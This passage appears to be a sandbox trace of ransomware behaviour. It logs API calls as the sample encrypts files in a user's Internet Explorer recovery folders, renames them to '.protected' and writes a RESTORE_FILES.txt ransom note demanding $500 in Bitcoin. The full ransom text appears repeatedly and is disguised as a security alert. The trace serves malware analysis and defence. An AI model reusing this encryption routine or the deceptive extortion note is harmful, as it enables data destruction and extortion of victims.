(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat") returned 153 [0084.881] StrStrW (lpFirst="RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat", lpSrch=".rar") returned 0x0 [0084.881] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last 
Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat") returned 153 [0084.881] StrStrW (lpFirst="RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat", lpSrch=".zip") returned 0x0 [0084.881] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x1200, lpOverlapped=0x0) returned 1 [0084.882] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.882] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x1200, lpOverlapped=0x0) returned 1 [0084.882] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.883] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.883] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.883] CloseHandle (hObject=0x154) returned 1 [0084.883] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat.protected") returned 163 [0084.883] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat" (normalized: 
"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{aae6bf5c-4991-11e7-8e2b-c43dc7584a00}.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RecoveryStore.{AAE6BF5C-4991-11E7-8E2B-C43DC7584A00}.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\recoverystore.{aae6bf5c-4991-11e7-8e2b-c43dc7584a00}.dat.protected")) returned 1 [0084.884] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.884] lstrcmpiW (lpString1="{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="Windows") returned -1 [0084.884] lstrcmpiW (lpString1="{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="Program Files") returned -1 [0084.884] lstrcmpiW (lpString1="{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="Program Files (x86)") returned -1 [0084.884] lstrcmpiW (lpString1="{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="$Recycle.bin") returned 1 [0084.884] lstrcmpiW (lpString1="{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="System Volume Information") returned -1 [0084.884] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat") returned 139 [0084.884] StrStrIW (lpFirst="{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpSrch=".protected") returned 0x0 [0084.884] lstrcmpW (lpString1="{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="RESTORE_FILES.txt") returned -1 [0084.884] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.884] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, 
dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.884] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{4bd650f0-c8f9-11e7-b5bf-c43dc7584a00}.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.885] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat") returned 139 [0084.885] StrStrW (lpFirst="{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpSrch=".txt") returned 0x0 [0084.885] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat") returned 139 [0084.885] StrStrW (lpFirst="{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpSrch=".rar") returned 0x0 [0084.885] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat") returned 139 [0084.885] StrStrW (lpFirst="{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpSrch=".zip") returned 0x0 [0084.885] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x1200, lpOverlapped=0x0) returned 1 [0084.886] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.886] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1200, 
lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x1200, lpOverlapped=0x0) returned 1 [0084.887] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.887] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.887] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0084.887] CloseHandle (hObject=0x154) returned 1 [0084.887] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat.protected") returned 149 [0084.887] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{4bd650f0-c8f9-11e7-b5bf-c43dc7584a00}.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{4BD650F0-C8F9-11E7-B5BF-C43DC7584A00}.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{4bd650f0-c8f9-11e7-b5bf-c43dc7584a00}.dat.protected")) returned 1 [0084.888] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.888] lstrcmpiW (lpString1="{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat", 
lpString2="Windows") returned -1 [0084.888] lstrcmpiW (lpString1="{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="Program Files") returned -1 [0084.888] lstrcmpiW (lpString1="{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="Program Files (x86)") returned -1 [0084.888] lstrcmpiW (lpString1="{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="$Recycle.bin") returned 1 [0084.888] lstrcmpiW (lpString1="{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="System Volume Information") returned -1 [0084.888] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat") returned 139 [0084.888] StrStrIW (lpFirst="{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpSrch=".protected") returned 0x0 [0084.888] lstrcmpW (lpString1="{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpString2="RESTORE_FILES.txt") returned -1 [0084.888] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.888] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{69512155-c8f9-11e7-b5bf-c43dc7584a00}.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.889] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last 
Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat") returned 139 [0084.889] StrStrW (lpFirst="{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpSrch=".txt") returned 0x0 [0084.889] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat") returned 139 [0084.889] StrStrW (lpFirst="{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpSrch=".rar") returned 0x0 [0084.889] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat") returned 139 [0084.889] StrStrW (lpFirst="{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat", lpSrch=".zip") returned 0x0 [0084.889] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x1200, lpOverlapped=0x0) returned 1 [0084.896] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.896] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x1200, lpOverlapped=0x0) returned 1 [0084.897] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.897] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0084.897] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, 
lpOverlapped=0x0) returned 1 [0084.897] CloseHandle (hObject=0x154) returned 1 [0084.897] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat.protected") returned 149 [0084.897] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{69512155-c8f9-11e7-b5bf-c43dc7584a00}.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\{69512155-c8f9-11e7-b5bf-c43dc7584a00}.dat.protected")) returned 1 [0084.898] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0084.898] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0084.898] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RESTORE_FILES.txt") returned 114 [0084.898] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\last active\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.899] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.899] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0084.899] lstrlenA (lpString="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") returned 684 [0084.899] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 
[0084.899] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.899] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0084.900] CloseHandle (hObject=0x150) returned 1 [0084.900] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0084.900] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0084.900] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\RESTORE_FILES.txt") returned 102 [0084.900] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\recovery\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.900] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.900] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0084.901] lstrlenA (lpString="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") returned 684 [0084.901] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0084.901] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.901] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, 
lpOverlapped=0x0) returned 1 [0084.901] CloseHandle (hObject=0x14c) returned 1 [0084.902] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0084.902] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0084.902] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\RESTORE_FILES.txt") returned 93 [0084.902] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0084.902] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.902] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0084.903] lstrlenA (lpString="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") returned 684 [0084.903] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0084.903] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.903] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0084.903] CloseHandle (hObject=0xd8) returned 1 [0084.904] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0084.904] lstrcmpiW (lpString1="Media Player", lpString2="Windows") returned -1 [0084.904] lstrcmpiW (lpString1="Media Player", lpString2="Program Files") returned -1 [0084.904] lstrcmpiW (lpString1="Media Player", lpString2="Program Files (x86)") returned -1 [0084.904] lstrcmpiW (lpString1="Media Player", lpString2="$Recycle.bin") returned 1 [0084.904] lstrcmpiW (lpString1="Media Player", lpString2="System Volume Information") returned -1 [0084.904] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player") returned 70 [0084.904] lstrcmpW (lpString1="Media Player", lpString2=".") returned 1 [0084.904] lstrcmpW (lpString1="Media Player", lpString2="..") returned 1 [0084.904] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\*") returned 72 [0084.904] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0084.905] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.905] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.905] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.905] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.905] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.905] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\.") returned 72 [0084.905] lstrcmpW (lpString1=".", lpString2=".") 
